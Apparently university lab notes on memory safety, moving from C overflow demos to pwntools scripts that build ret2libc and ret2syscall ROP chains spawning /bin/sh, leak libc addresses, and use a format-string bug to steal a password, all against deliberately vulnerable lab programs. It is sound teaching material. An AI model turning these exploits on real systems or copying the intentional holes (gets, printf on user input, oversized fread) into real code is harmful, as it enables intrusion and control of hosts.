Lecture Notes
This lecture presents an overview of issues involving buffers that are overflowed, underflowed, or otherwise used incorrectly.
Practical tasks
This guide will complement the lecture slides and present code and descriptions to enable exploitation of buffer vulnerabilities.
Most of the analysis is greatly facilitated if you use GEF. Follow the instructions in its GitHub repository to install it.
The pwntools Python package may also be useful. Install it with the python3-pwntools system package, or with pip install pwntools inside a virtual environment.
Memory Structure and Variables
Languages such as C/C++, among others, allow great flexibility in the use of variables. From a typing perspective, these languages are not fully type-safe: the safety of variable types is limited and can easily be circumvented by developers. Recent compilers provide a great amount of information to help developers avoid type errors, but that does not prevent developers from casting variables to incompatible types, especially when dealing with pointers to structures (the cast is valid, but the content structure is not compatible).
Then there is the notion of memory safety, which is simply not present in these languages. A language that is not memory safe allows developers to access memory with great freedom, exposing the whole virtual address space allocated to the program.
The following program (not_type_safe.c) gives some insight into the problem. Compile it and run it on your computer. Try to explain the values printed.
int aux = 42;       // Integer
int *value = &aux;  // Pointer to Integer
// Correct usage
printf("%d\n", *value);
printf("%d\n", *(value + 4)); // Reading memory after the variable
printf("%d\n", *(value - 4)); // Reading memory before the variable
printf("%f\n", *((double*) &value)); // Cast to variable with different storage
printf("%llu\n", *((unsigned long long*) &value)); // Cast to variable with different size
The result is something like the following, which includes the value 42 but also other, less obvious values.
42
32693
1
0.000000
140737456555452
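The last two values come from the same 8 bytes (the pointer itself) read under two different types. As a rough illustration, the sketch below uses Python rather than C and reuses the sample value printed above; the variable names are ours and the value will differ on your system.

```python
import struct

# Sample pointer value taken from the output above (it differs on every system).
pointer_value = 140737456555452

# The 8 bytes that store the pointer on a little-endian x86_64 machine.
raw = struct.pack("<Q", pointer_value)

# Reading the same bytes as an unsigned 64-bit integer returns the address...
as_integer = struct.unpack("<Q", raw)[0]
# ...while reading them as an IEEE 754 double yields a tiny subnormal number.
as_double = struct.unpack("<d", raw)[0]

print(hex(as_integer))
print("%f" % as_double)
```

Because the upper bits of a user-space address are zero, the exponent field of the double is zero as well, so the number is far too small to show up with six decimal places.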
A similar program, not_memory_safe.c, specifically explores memory safety with dynamic memory. Check its output, as it will probably be very different from what you expect.
char* buffer = (char*) malloc(10); // Buffer with 10 bytes
char* str = buffer;                // Pointer to buffer
free(buffer);                      // Free buffer!
// Write after free (and write beyond buffer)
memcpy(str, "Hello World!!!!", 15);
printf("%s\n", str); // Read after free (and read beyond buffer)
Different variable types are allocated to different memory areas. This is intrinsic to each program and is broadly defined by how the program is compiled. When the program is loaded, the addresses may change, but they will still respect this notion of areas.
The following program (mem.c) will print the address of several variables that you may find in a program. Some variables are local, some are global, some are static, some are dynamic. Then you also have program arguments and functions. During the creation of a program the programmer will decide how to declare a variable, and this will have some impact on where the variable is placed in memory.
const char cntvar[]="constant";
static char bssvar[4];
// ... OMITTED
int main(int argc, char** argv) {
    FILE* fd;
    char line[1024];
    unsigned int mask;
    unsigned int stack = (unsigned int) &argc;
    unsigned int heap = (unsigned int) malloc(sizeof(unsigned int));
    unsigned int bss = (unsigned int) bssvar;
    unsigned int cnst = (unsigned int) cntvar;
    unsigned int text = (unsigned int) &main;
    // Build a mask that clears the offset bits inside a page
    memset(&mask,0xff,sizeof(mask));
    mask ^= getpagesize() -1;
    printf("Internal Variables (Page = %u)\n", getpagesize());
    printf("&argc = %08x -> stack = %08x\n", stack, stack & mask);
    printf("malloc = %08x -> heap = %08x\n", heap, heap & mask);
    printf("bssvar = %08x -> bss = %08x\n", bss, bss & mask);
    printf("cntvar = %08x -> const = %08x\n", cnst,cnst & mask);
    printf("&main = %08x -> text = %08x\n", text,text & mask);
}
You can compile the program with gcc -g -o mem mem.c.
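The mask used by mem.c simply clears the bits that select a byte inside a page, leaving the address where the page starts. A minimal sketch of the same computation follows, in Python for brevity; the helper name page_base and the sample address are hypothetical.

```python
def page_base(address: int, page_size: int = 4096) -> int:
    """Return the start address of the page that contains `address`."""
    mask = ~(page_size - 1)  # all bits set except the in-page offset bits
    return address & mask

# Hypothetical stack address, used only to illustrate the masking.
sample = 0x7ffd6df80038
print(hex(sample), "->", hex(page_base(sample)))
```

With a 4096-byte page, the lower 12 bits (three hexadecimal digits) are cleared, which is why the masked addresses printed by the program end in 000.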
NOTE: Recent versions of GCC implement several mitigations against some of the attacks described here. Because the programs we are going to use are small, which reduces the number of artifacts, it may be better to use an older GCC through Docker. You can run it with
docker run --rm -ti -v $(pwd):/host gcc:8 gcc FLAGS -o /host/output /host/input.c. Alternatively, use the pre-compiled binaries we provide.
Task:
- Run the program. Compile if you wish, but prefer the provided binaries.
- Match the addresses printed with the different variable types
- Change the location of a variable, or create others of the same type, and see how it affects the resulting address.
The program also allocates memory in the program stack, by calling a function recursively until all memory is exhausted.
void foo(int argc, unsigned int mask, unsigned int c, unsigned int m)
{
    char a[4096*0x100];
    unsigned int stack = (unsigned int) &argc;
    printf("foo [%03u]: &argc = %08x -> stack = %08x\n",c,stack, stack & mask);
    if(c < m)
        foo(argc,mask, c+1, m);
}
Each call stores the address of the argc argument in a variable named stack (this could be avoided, and is here for clarification), and allocates a variable named a of size 4096 * 0x100. 4096 (or 0x1000) is the standard page size, while 0x100 sets the number of pages. The larger this value, the quicker the program exhausts the available stack memory.
A possible result would be:
foo [000]: &argc = 00007ffd6df80038 -> stack = 000000006df80000
foo [001]: &argc = 00007ffd6de7fff8 -> stack = 000000006de7e000
foo [002]: &argc = 00007ffd6dd7ffb8 -> stack = 000000006dd7e000
foo [003]: &argc = 00007ffd6dc7ff78 -> stack = 000000006dc7e000
foo [004]: &argc = 00007ffd6db7ff38 -> stack = 000000006db7e000
foo [005]: &argc = 00007ffd6da7fef8 -> stack = 000000006da7e000
foo [006]: &argc = 00007ffd6d97feb8 -> stack = 000000006d97e000
You should notice that stack allocation grows from higher addresses to lower addresses. Depending on your system configuration, the addresses presented may be constant or slightly random.
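The sample output also tells us how large each stack frame of foo is. The sketch below (Python, with the addresses copied from the output above) subtracts consecutive &argc values; the 8 MiB stack limit is an assumption, a common Linux default that you should confirm with ulimit -s.

```python
# &argc values copied from the sample output above.
addresses = [
    0x7ffd6df80038, 0x7ffd6de7fff8, 0x7ffd6dd7ffb8, 0x7ffd6dc7ff78,
    0x7ffd6db7ff38, 0x7ffd6da7fef8, 0x7ffd6d97feb8,
]

# Distance between consecutive frames (positive because the stack grows down).
deltas = [high - low for high, low in zip(addresses, addresses[1:])]
frame_size = deltas[0]
array_size = 4096 * 0x100            # size of the local array `a`
overhead = frame_size - array_size   # everything else stored in the frame

# Assumption: an 8 MiB stack limit (check `ulimit -s` on your system).
stack_limit = 8 * 1024 * 1024
estimated_depth = stack_limit // frame_size

print(hex(frame_size), overhead, estimated_depth)
```

Every frame takes the size of the array plus a small fixed overhead, and the estimated depth is consistent with the seven lines shown above, although the exact limit also depends on what is already on the stack when main starts.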
Tasks:
- Take note of the addresses on your system, and of how memory usage evolves.
- Run it multiple times and compare the results.
- Determine the maximum stack size for your system.
Variable allocation
Program state is considered to be ephemeral and resides in memory areas specifically allocated for this purpose. Each function will allocate a new stack frame with local variables, and in some calling conventions, arguments to other functions that are called. Although when developing an application we use variables with specific names, when the code is compiled, variables are only memory spaces (have no names). If the language is not type safe, and/or has no memory management features, memory access may be totally unconstrained, and read/write before or beyond the variable allocated memory space may be possible.
Consider the following program, which declares two variables, buffer and message. buffer is a char array with 5 bytes, while message is an array initialized to Hello World.
The for loop writes the value A to buffer, but instead of writing only 5 bytes, it writes 15 bytes. The question that arises is: where are these bytes going to be stored?
The program also prints the variable message before and after the loop, which may help us find out.
To check what happens, save the code to bo.c, compile the program, and execute it with ./bo. What you will see is a basic overflow, but more on this later.
#include <stdio.h>
int main(int argc, char* argv[]){
    char message[] = "Hello World";
    char buffer[5];
    int i;
    printf("buffer=%s message=%s\n", buffer, message);
    // Writes 15 bytes into a 5-byte array
    for(i = 0; i < 15; i++) {
        buffer[i] = 'A';
    }
    printf("buffer=%s message=%s\n", buffer, message);
}
A naive analysis could assume the following output, supposing that buffer initially contains only 0x00 bytes. Another assumption could be that the program crashes.
buffer= message=Hello World
buffer=AAAAAAAAAAAAAAA message=Hello World
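To reason about where the extra bytes may go, it can help to model memory as a flat array of bytes. The sketch below is a simulation in Python, not the real program: it assumes that message is placed immediately after buffer, with no padding, which a real compiler is free not to do. The helper c_string is hypothetical.

```python
def c_string(memory: bytearray, start: int) -> str:
    """Read bytes from `start` up to the first NUL, as printf("%s") would."""
    end = memory.index(0, start)
    return memory[start:end].decode("ascii")

# Assumed layout: buffer[5] immediately followed by message[12].
BUFFER, MESSAGE = 0, 5
memory = bytearray(5) + bytearray(b"Hello World\x00")

for i in range(15):  # same loop as bo.c: 15 writes into a 5-byte array
    memory[BUFFER + i] = ord("A")

print("buffer=%s message=%s" % (c_string(memory, BUFFER), c_string(memory, MESSAGE)))
```

Under this assumed layout, the writes beyond the fifth byte land inside message, and printing buffer runs on until the terminator that originally belonged to message. Compare this model with what your binary actually prints.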
Another available file (mem_local.c) also prints the addresses of several variables. It can be used to see how the location of a declaration affects the actual memory allocation.
Tasks:
- Execute the bo and mem_local programs.
- What can you conclude about the memory structure of these variables and programs?
- Create a diagram of the memory structure.
- Instead of filling the buffer with A, fill it with a variable value (e.g. 'A' + i)
Buffer Overflows and TOCTOU
Many operations are not atomic. Specifically, when the Time Of Check and the Time Of Use do not coincide, it may be possible to invalidate the check, or to change its result, allowing access to additional resources.
The following example code is a crude demonstration of TOCTOU, which can be controlled through a buffer overflow. Specifically, the message variable can be used to overwrite the allowed variable, essentially bypassing the previous check.
int main() {
    char allowed = 0;
    char password[8];
    char username[8];
    char message[32];
    puts("username:");
    gets(username);
    puts("password:");
    gets(password);
    allowed = strcmp("admin", username) + \
        strcmp("topsecrt", password);
    puts("message:");
    gets(message);
    // <-- Issue here
    printf("user=%s pass=%s result=%d\n", username, \
        password, allowed);
    if(allowed == 0)
        printf("Access granted. Message sent!\n");
    else
        printf("Access denied\n");
    return 0;
}
If you use gdb to analyze the memory, you can check the order of the variables, and notice that message is placed before allowed. Therefore, an overflow of message will write over allowed. The amount of data to write depends on the distance between the variables, which can be calculated. An attacker without access to the binary might need to brute-force this distance, but we won’t need to.
NOTE: with gdb you can use the p (print) command to show the content of variables.
$ gdb ./toctou
gdb# br main
gdb# r
gdb# p &allowed
0x7ffffffedf2f
gdb# p &username
0x7ffffffedf1f
gdb# p &password
0x7ffffffedf27
gdb# p &message
0x7ffffffedef0
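From these addresses, the distance between message and allowed follows by subtraction. The sketch below (Python, using the sample addresses above, which will differ on your system) computes it and builds a candidate input for the message prompt.

```python
# Addresses copied from the gdb session above (they differ on every system).
addr_allowed = 0x7ffffffedf2f
addr_message = 0x7ffffffedef0

# Number of bytes between message[0] and allowed.
distance = addr_allowed - addr_message

# gets() stores the input and then appends a terminating NUL byte. With exactly
# `distance` input bytes, that NUL lands on `allowed` and resets it to 0.
payload = b"A" * distance

print(distance, len(payload))
```

Note that username and password sit between message and allowed in this layout, so they are overwritten as well; this is visible in the line printed by the program after the message is read.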
Tasks:
- Run the prog_2 program. If you wish to compile, use these flags: gcc -g -O0 -fno-stack-protector -o prog_2 prog_2.c
- Analyze the execution with different payloads
- Determine
  - What is the stack base address? (info frame)
  - Where is the return information? (saved RIP in info frame)
  - How many bytes can be entered to the message without overflow? (sizeof message)
  - How many bytes can be written without damage? (print the variable addresses)
  - What happens when an overflow is achieved? (Do it and check the memory content)
  - How can the decision be subverted? (Do it and check the memory content)
Return to Libc (Ret2Libc)
Ret2Libc (Return-to-Libc) is a binary exploitation technique used to bypass a specific security defense called NX (No-Execute) or DEP (Data Execution Prevention). Instead of injecting new malicious code (shellcode) onto the stack and trying to run it, the attacker reuses code that already exists inside the program’s memory—specifically, functions from the Standard C Library (libc).
In the “old days” of buffer overflows (Stack Smashing), an attacker would inject malicious binary code (shellcode) onto the stack, then redirect the CPU to jump to the stack, where the CPU would execute the injected code. However, modern systems mark the stack as Non-Executable (NX). If the CPU tries to execute instructions found on the stack, the OS kills the program immediately (Segfault).
Since attackers can’t write new code to the stack and run it, they can look for code that is already executable, and use it.
Almost every C program loads the standard library (libc.so on Linux, msvcrt.dll on Windows). This library contains thousands of powerful functions like printf, strcpy, and most importantly, system.
An overflow can overwrite the Return Address, but instead of pointing it to shellcode, the attacker points it to the address of the system() function inside libc. This is like cutting words out of a magazine (libc) and pasting them together to form sentences. You didn’t write the words yourself; you just rearranged what was already there. The security guard allows the magazine because it’s a trusted item.
To pull this off, an attacker needs to place three specific things into the memory (or registers):
- The Function Address: The memory address where system() lives.
- The Argument: The string /bin/sh (so system knows what to launch).
- The Return Address: Where system() should go after it finishes (often irrelevant, but usually set to exit() to avoid a crash).
It works differently in x86 and x86_64. The concept is the same, but the setup differs because of how arguments are passed.
In 32-bit (x86), arguments are passed on the stack. You simply construct your overflow payload like a sandwich: [ Padding ] + [ Address of system() ] + [ Address of exit() ] + [ Address of "/bin/sh" ]
When the function returns, it jumps to system. system looks at the stack, sees /bin/sh, and executes it.
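As an illustration of the 32-bit layout, the sketch below assembles such a payload with Python's struct module. Every number in it (the padding size and the three addresses) is a hypothetical placeholder, not a value taken from a real binary or libc.

```python
import struct

def p32(value: int) -> bytes:
    """Pack a 32-bit little-endian value, as x86 stores addresses."""
    return struct.pack("<I", value)

# All values below are hypothetical placeholders, not real addresses.
PADDING_SIZE = 44          # bytes from the buffer start to the return address
ADDR_SYSTEM = 0xF7E12340   # where system() would live
ADDR_EXIT = 0xF7E05670     # where exit() would live
ADDR_BINSH = 0xF7F5A0CF    # where the string "/bin/sh" would live

payload = b"A" * PADDING_SIZE
payload += p32(ADDR_SYSTEM)  # overwrites the saved return address
payload += p32(ADDR_EXIT)    # return address seen by system()
payload += p32(ADDR_BINSH)   # first argument of system()

print(len(payload))
```

The order matters: when system starts executing, it expects its own return address at the top of the stack and its first argument right after it, which is why exit is placed between system and the string address.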
In 64-bit (x86_64), arguments are passed in registers (specifically, the RDI register for the first argument). You cannot just put /bin/sh on the stack and expect system to see it.
An attack needs a ROP Gadget (like POP RDI; RET). The payload forces the CPU to jump to the gadget first. The gadget pops the address of /bin/sh from the stack into the RDI register, and then the gadget returns to system().
Consider the following program, which detects the type of an image based on its header. The program has a buffer overflow vulnerability in the call to fread, which reads more bytes than the allocated buffer size.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void detect_image_format(const char *filename) {
FILE *file = fopen(filename, "rb");
if (!file) {
printf("Error: Could not open file %s\n", filename);
return;
}
unsigned char header[8];
// Since header is only 8 bytes, this causes a Buffer Overflow.
size_t bytesRead = fread(header, 1, 128, file);
fclose(file);
if (bytesRead < 2) {
printf("File is too small to be an image.\n");
return;
}
if (header[0] == 0x42 && header[1] == 0x4D)
printf("[+] Detected: BMP Image\n");
else if (header[0] == 0xFF && header[1] == 0xD8 && header[2] == 0xFF)
printf("[+] Detected: JPG Image\n");
else if (header[0] == 0x89 && header[1] == 0x50 && header[2] == 0x4E && header[3] == 0x47)
printf("[+] Detected: PNG Image\n");
else
printf("[-] Unknown file format.\n");
}
int main(int argc, char** argv) {
if (argc == 2)
detect_image_format(argv[1]);
else
printf("Usage: %s image\n", argv[0]);
return 0;
}
Tasks:
- Compile the program with gcc -o image_identifier image_identifier.c -no-pie -fno-stack-protector -z execstack -g
- Analyze the program with gdb and determine the buffer overflow vulnerability.
- Create a payload that overflows the buffer and overwrites the return address to call system("/bin/sh").
- Use pwntools to create the payload. Consider the following script, adjusting the values as needed.
  - You will need to set the correct BASE_ADDR for your libc version and system. (Use GDB and info proc mappings to find the base address of libc when the program is running)
  - Adjust the padding_size according to the overflow point (buffer size + saved RBP size). (Use GDB and info frame to find the offset)
from pwn import *
import sys
import os

def create_payload():
    exe = ELF("./image_identifier")
    libc = exe.libc    # libc used by the binary on this system
    rop = ROP(libc)

    BASE_ADDR = 0x0    # Placeholder: libc base address; adjust as needed

    addr_system = libc.sym['system'] + BASE_ADDR
    addr_exit = libc.sym['exit'] + BASE_ADDR
    addr_binsh = next(libc.search(b'/bin/sh')) + BASE_ADDR
    addr_pop_rdi = rop.find_gadget(['pop rdi', 'ret']).address + BASE_ADDR
    addr_ret = rop.find_gadget(['ret']).address + BASE_ADDR

    print(f"[*] System addr: {hex(addr_system)}")
    print(f"[*] /bin/sh addr: {hex(addr_binsh)}")
    print(f"[*] pop rdi addr: {hex(addr_pop_rdi)}")
    print(f"[*] ret addr: {hex(addr_ret)}")

    padding_size = 0   # Placeholder: adjust according to overflow point
    padding = b"A" * padding_size

    rop_chain = p64(addr_ret)       # 0. Align stack
    rop_chain += p64(addr_pop_rdi)  # 1. pop rdi; ret
    rop_chain += p64(addr_binsh)    # 2. address of /bin/sh (into rdi)
    rop_chain += p64(addr_system)   # 3. address of system
    rop_chain += p64(addr_exit)     # 4. clean exit
    return padding + rop_chain

if __name__ == "__main__":
    payload = create_payload()
    filename = "exploit_image.bmp"
    with open(filename, "wb") as f:
        f.write(payload)
Tasks:
- Run the script to create the exploit image file.
- Run the vulnerable program with the exploit image as argument: ./image_identifier exploit_image.bmp
- If successful, you should get a shell.
- Use gdb to analyze the execution and verify the register values before the call to system. You can break at the last line before the ret of function detect_image_format.
Return to Syscall (ret2syscall)
A Return-to-Syscall (ret2syscall) attack is a specific type of Return-Oriented Programming (ROP) exploit. Instead of jumping to a standard library function (like system() in libc), the attacker constructs a ROP chain that manually loads the CPU registers with specific values and then executes the syscall instruction to request an action directly from the OS kernel.
This is often used when system() is unavailable, when the attacker is dealing with a static binary (where libc offsets might not work the same way), or to bypass certain runtime protections that hook or monitor standard library calls.
How it differs from ret2libc:
- ret2libc (previous example): You set up the arguments and jump to the address of system(). The system function then handles the heavy lifting of talking to the kernel.
- ret2syscall: You act as the wrapper function. You manually put the syscall number and arguments into registers, then trigger the kernel interrupt yourself.
In x86-64 Linux, system calls follow a strict convention. To spawn a shell using execve("/bin/sh", 0, 0), you must set up the registers as follows:
- RAX: Stores the Syscall Number. (For execve, this is 59 or 0x3b).
- RDI: Stores the first argument (filename, pointer to "/bin/sh").
- RSI: Stores the second argument (argv, usually 0 or NULL for a simple shell).
- RDX: Stores the third argument (envp, usually 0 or NULL).
The payload construction is similar to ret2libc, but instead of jumping to system(), you jump to a syscall instruction after setting up the registers:
- Padding: Fill the buffer up to the return address.
- Gadget 1: pop rax; ret -> Overwrite RIP to jump here.
- Value 1: 0x3b (59) -> Pops into RAX.
- Gadget 2: pop rdi; ret
- Value 2: Address of /bin/sh -> Pops into RDI.
- Gadget 3: pop rsi; ret
- Value 3: 0x0 -> Pops into RSI.
- Gadget 4: pop rdx; ret
- Value 4: 0x0 -> Pops into RDX.
- Gadget 5: syscall; ret -> The kernel sees the values in the registers and executes execve.
Consider the same program as before (image_identifier.c). Consider the following script to create the payload for a ret2syscall attack:
from pwn import *
import sys
import os

def create_payload():
    exe = ELF('./image_identifier', checksec=False)
    libc = exe.libc
    libc.address = 0x0  # Placeholder: adjust according to your system and libc version
    rop = ROP(libc)

    addr_binsh = next(libc.search(b'/bin/sh'))
    addr_pop_rax = rop.find_gadget(['pop rax', 'ret']).address
    addr_pop_rdi = rop.find_gadget(['pop rdi', 'ret']).address
    addr_pop_rsi = rop.find_gadget(['pop rsi', 'ret']).address

    # Gadget: pop rdx; ret (Arg 3: envp)
    # Note: 'pop rdx; ret' is rare. We often find 'pop rdx; pop rbx; ret' or similar.
    # Pwntools ROP engine tries to find the cleanest one.
    # We check for a fallback here specifically for RDX as it's the most volatile.
    gadget_rdx = rop.find_gadget(['pop rdx', 'ret'])
    if not gadget_rdx:
        # Fallback to a complex gadget if simple one fails (common in libc)
        gadget_rdx = rop.find_gadget(['pop rdx', 'pop rbx', 'ret'])
    if not gadget_rdx:
        print("[-] Error: Could not find a suitable 'pop rdx' gadget.")
        sys.exit(1)
    addr_pop_rdx = gadget_rdx.address

    # Gadget: syscall; ret
    addr_syscall = rop.find_gadget(['syscall', 'ret']).address

    # Verbose Output
    print(f"[*] /bin/sh addr: {hex(addr_binsh)}")
    print(f"[*] pop rax addr: {hex(addr_pop_rax)}")
    print(f"[*] pop rdi addr: {hex(addr_pop_rdi)}")
    print(f"[*] pop rsi addr: {hex(addr_pop_rsi)}")
    print(f"[*] pop rdx addr: {hex(addr_pop_rdx)}")
    print(f"[*] syscall addr: {hex(addr_syscall)}")

    padding_size = 0  # Placeholder: adjust this value based on the buffer overflow offset
    padding = b"A" * padding_size

    # --- ROP CHAIN CONSTRUCTION ---
    # We are constructing execve("/bin/sh", 0, 0) via syscall.
    # Syscall number for execve is 59 (0x3b).
    rop_chain = b""
    # 1. Set RAX = 59 (Syscall Number)
    rop_chain += p64(addr_pop_rax)
    rop_chain += p64(59)
    # 2. Set RDI = address of "/bin/sh" (Arg 1)
    rop_chain += p64(addr_pop_rdi)
    rop_chain += p64(addr_binsh)
    # 3. Set RSI = 0 (Arg 2: argv)
    rop_chain += p64(addr_pop_rsi)
    rop_chain += p64(0)
    # 4. Set RDX = 0 (Arg 3: envp)
    rop_chain += p64(addr_pop_rdx)
    rop_chain += p64(0)
    # Check if our RDX gadget pops extra registers (like 'pop rdx; pop rbx; ret')
    # If so, we need to provide padding for those extra pops.
    if 'pop rbx' in str(gadget_rdx):
        print("[*] Note: RDX gadget pops RBX as well. Adding padding.")
        rop_chain += p64(0)  # Padding for RBX
    # 5. Execute Syscall
    rop_chain += p64(addr_syscall)
    return padding + rop_chain

if __name__ == "__main__":
    context.arch = 'amd64'
    payload = create_payload()
    filename = "exploit_image.bmp"
    with open(filename, "wb") as f:
        f.write(payload)
Tasks:
- Adjust the libc base address (libc.address in the script) according to your system and libc version.
- Adjust the padding_size according to the overflow point (buffer size + saved RBP size).
- Run the script and create the exploit_image.bmp file.
- Run the image_identifier program with the created file as argument and verify that a shell is spawned.
- Use gdb to analyze the execution and verify the register values before the syscall instruction. You can break at the last line before the ret of function detect_image_format.
The Relevance of Information Leaks
Information leaks are vulnerabilities that allow an attacker to gain access to sensitive information from a system or application. This information can include memory addresses, stack canaries, or other data that can be used to facilitate further attacks, such as buffer overflows or return-oriented programming (ROP) attacks. In the previous examples, we assumed that the attacker had knowledge of the base address of libc. In real-world scenarios, this information is often not directly available due to security mechanisms like Address Space Layout Randomization (ASLR). However, information leaks can provide the necessary details to bypass these protections.
Consider that in the last examples, we used hardcoded addresses for libc functions and gadgets. In a real-world scenario, an attacker would need to find a way to leak these addresses. This could be done through various means, such as exploiting format string vulnerabilities, using side-channel attacks, or leveraging other vulnerabilities in the application.
Modify the previous C programs to write the address of a libc function (like printf or puts) to the output. This can be done by simply printing the address of the function using the %p format specifier.
int main() {
// Other code...
printf("Address of printf: %p\n", printf);
// Other code...
}
Now, when you run the program, it will output the address of printf. An attacker can use this information to calculate the base address of libc and subsequently determine the addresses of other functions and gadgets needed for a ret2libc or ret2syscall attack.
from pwn import *
import sys
import os

def leak_libc_address():
    p = process('./image_identifier')
    p.recvuntil(b'Address of printf: ')
    leak = p.recvline().strip()
    printf_addr = int(leak, 16)
    log.info(f"Leaked printf address: {hex(printf_addr)}")
    return printf_addr

if __name__ == "__main__":
    leak_libc_address()
With the leaked address, you can calculate the base address of libc by subtracting the known offset of printf in your libc version. This allows you to dynamically construct your exploit payload without relying on hardcoded addresses.
The offset can be found using tools like readelf or objdump on your libc binary. This approach makes your exploit more robust and adaptable to different environments where ASLR is enabled. This is a common technique used by attackers to bypass modern security mechanisms, and the reason why in CTFs, the information about the libc version is often provided.
We do not know the base address of libc, but if we leak the address of printf, we can calculate it as follows:
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_base = printf_addr - libc.symbols['printf']
log.info(f"Calculated libc base address: {hex(libc_base)}")
This calculated base address can then be used to find the addresses of other functions and gadgets needed for the exploit. It also works with binaries on remote servers, as long as the same libc version is used.
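The arithmetic itself does not depend on pwntools. The sketch below shows it with plain integers, and adds a sanity check based on the fact that libraries are mapped on page boundaries. The helper name and both offsets are hypothetical; real offsets must come from your own libc.

```python
def libc_base_from_leak(leaked: int, symbol_offset: int) -> int:
    """Subtract the symbol's offset inside libc from its leaked runtime address."""
    base = leaked - symbol_offset
    # Libraries are mapped on page boundaries, so a valid base ends in 000.
    if base & 0xFFF:
        raise ValueError("base is not page aligned: wrong libc or wrong offset?")
    return base

leaked_printf = 0x7FFFF7A33440  # example leak; it changes on every run with ASLR
PRINTF_OFFSET = 0x55440         # hypothetical offset of printf inside libc
SYSTEM_OFFSET = 0x4F440         # hypothetical offset of system inside libc

base = libc_base_from_leak(leaked_printf, PRINTF_OFFSET)
print(hex(base), hex(base + SYSTEM_OFFSET))
```

The alignment check is a cheap way to notice that the wrong libc version was assumed: with a wrong offset, the computed base will usually not end in 000.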
Tasks:
- Modify the previous C programs to leak the address of a libc function.
- Create a script to capture the leaked address and calculate the base address of libc.
- Use the calculated base address to construct a ret2libc or ret2syscall payload dynamically.
- Test the complete exploit to verify that it works without hardcoded addresses.
What if we do not know the libc version? In this case, we can use libc-database to find the correct version. The database contains a large number of libc versions with their respective offsets. By providing the leaked address and the offset of a known function, we can search the database for matching libc versions.
from pwn import *
from LibcSearcher import LibcSearcher  # separate third-party package, not part of pwntools
import sys
import os

def find_libc_version(printf_addr):
    db = LibcSearcher('printf', printf_addr)
    libc_base = printf_addr - db.dump('printf')
    # Note: the attribute holding the libc name may differ between LibcSearcher versions
    log.info(f"Identified libc version: {db.libc_name}")
    log.info(f"Calculated libc base address: {hex(libc_base)}")
    return libc_base, db

if __name__ == "__main__":
    printf_addr = 0x7ffff7a33440  # Example leaked address
    find_libc_version(printf_addr)
Tasks:
- Use the libc-database to identify the libc version based on a leaked function address.
- Integrate this into your exploit script to dynamically find the libc version and construct the payload.
- Test the complete exploit to verify that it works without prior knowledge of the libc version.
Format String Attacks
The Format String exploit occurs when the submitted data of an input string is evaluated as a command by the application. In this way, the attacker could execute code, read the stack, or cause a segmentation fault in the running application, causing new behaviors that could compromise the security or the stability of the system. It also could be used to leak information about the memory layout of the application, which could be useful for further exploitation, such as in Return Oriented Programming (ROP) attacks.
The attack could be executed when the application doesn’t properly validate the submitted input. In this case, if a Format String parameter, like %x, is inserted into the posted data, the string is parsed by the Format Function, and the conversion specified in the parameters is executed. However, the Format Function is expecting more arguments as input, and if these arguments are not supplied, the function could read or write the memory.
Consider the following example (printf_login), which has this vulnerability. The password is random, but the user is printed directly in a wrong manner.
Also, an invalid check is made, resulting in the possibility of exploiting the username variable in order to leak the password and then access the system.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/random.h>
#include <unistd.h>
char *ref_user = "root";
char ref_pass[1024];
void init_pass(char *s, const int len) {
getrandom(s, len, 0);
static const char alphanum[] = "0123456789#$!ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
for (int i = 0; i < len; ++i) {
s[i] = alphanum[((unsigned char) s[i]) % (sizeof(alphanum) - 1)];
}
s[len] = 0;
}
void check_user_pass(char* ref_user, char* ref_pass) {
char username[64];
char password[64];
memset(username, 0, 64);
memset(password, 0, 64);
fprintf(stdout, "User: ");
fgets(username, sizeof(username), stdin);
// VULNERABILITY HERE
printf(username);
fprintf(stdout,"\n");
// Strip newline if present for comparison
username[strcspn(username, "\n")] = 0;
if (strncmp(username, ref_user, strlen(ref_user)) != 0) {
printf("Invalid user\n");
exit(-1);
}
printf("Pass: ");
fgets(password, sizeof(password), stdin);
if (strncmp(password, ref_pass, strlen(ref_pass)) != 0) {
printf("Invalid password.\n");
exit(-2);
}
}
int main() {
setbuf(stdout, NULL);
setbuf(stdin, NULL);
setbuf(stderr, NULL);
printf("Generating Random Pass...");
init_pass(ref_pass, 16);
printf("Done\n");
check_user_pass(ref_user, ref_pass);
printf("Access Granted\n");
}
Before you start it is important to determine the printf argument offset. The offset refers to the distance between the stack pointer (where printf thinks its arguments begin) and the location of your user-controlled format string buffer. Finding this offset is the critical first step in exploiting a format string vulnerability because it allows you to read from or write to specific memory addresses.
Typically in x86_64 architectures the value will be around 6, due to the calling convention in use. To determine it, provide a payload in the format b'%{offset}$xaaaaaaaa', and change the value of the offset until the output contains 61616161.
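Trying offsets by hand quickly becomes tedious, so the probes can be generated. The sketch below only builds the payloads and checks a captured output for the marker; sending each probe to the program is left out, and both helper names are hypothetical.

```python
def make_probe(offset: int, marker: bytes = b"aaaaaaaa") -> bytes:
    """Build a payload such as b'%6$xaaaaaaaa' for the given argument offset."""
    return b"%" + str(offset).encode() + b"$x" + marker

def marker_found(output: bytes) -> bool:
    """True when the printed hex value is made of marker bytes (0x61 is 'a')."""
    return b"61616161" in output

# Candidate probes for offsets 1 to 10.
probes = [make_probe(i) for i in range(1, 11)]
print(probes[5])
```

Each probe would be sent as the username in a fresh run of the program, and the first offset for which marker_found returns True on the echoed line is the one that points into the user-controlled buffer.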
Tasks:
- Run the printf_login program, or compile and run the code presented: gcc printf_login.c -o printf_login -no-pie -fno-stack-protector -z execstack
- Find how you can provide some payload besides the username
Because the credentials are dynamic, a script is needed. The process can be facilitated with pwntools, as it supports the methods for interacting with applications. Consider the following script:
from pwn import *
import sys

context.binary = binary = ELF('./printf_login')

def solve():
    p = process(binary.path)
    offset = 6  # X86_64 calling convention offset for first user input
    fmt = f"root%{offset}$s".encode()
    p.sendlineafter(b'User: ', fmt)      # Send payload to leak password
    leak = p.recvuntil(b'\n\n').strip()  # Read until double newline
    log.info(f"Received: {leak}")        # Log the received data
    password = leak[4:]                  # Extract password after 'root'
    log.success(f"Leaked Password: {password.decode('latin-1')}")  # Log the leaked password
    p.sendline(password)                 # Send the leaked password
    log.info(p.recvall().decode('latin-1'))

if __name__ == "__main__":
    solve()
Tasks:
- Use the script and verify that you can get the password
- Explain what happened. You can use gdb to check the memory structure.
Shellcode
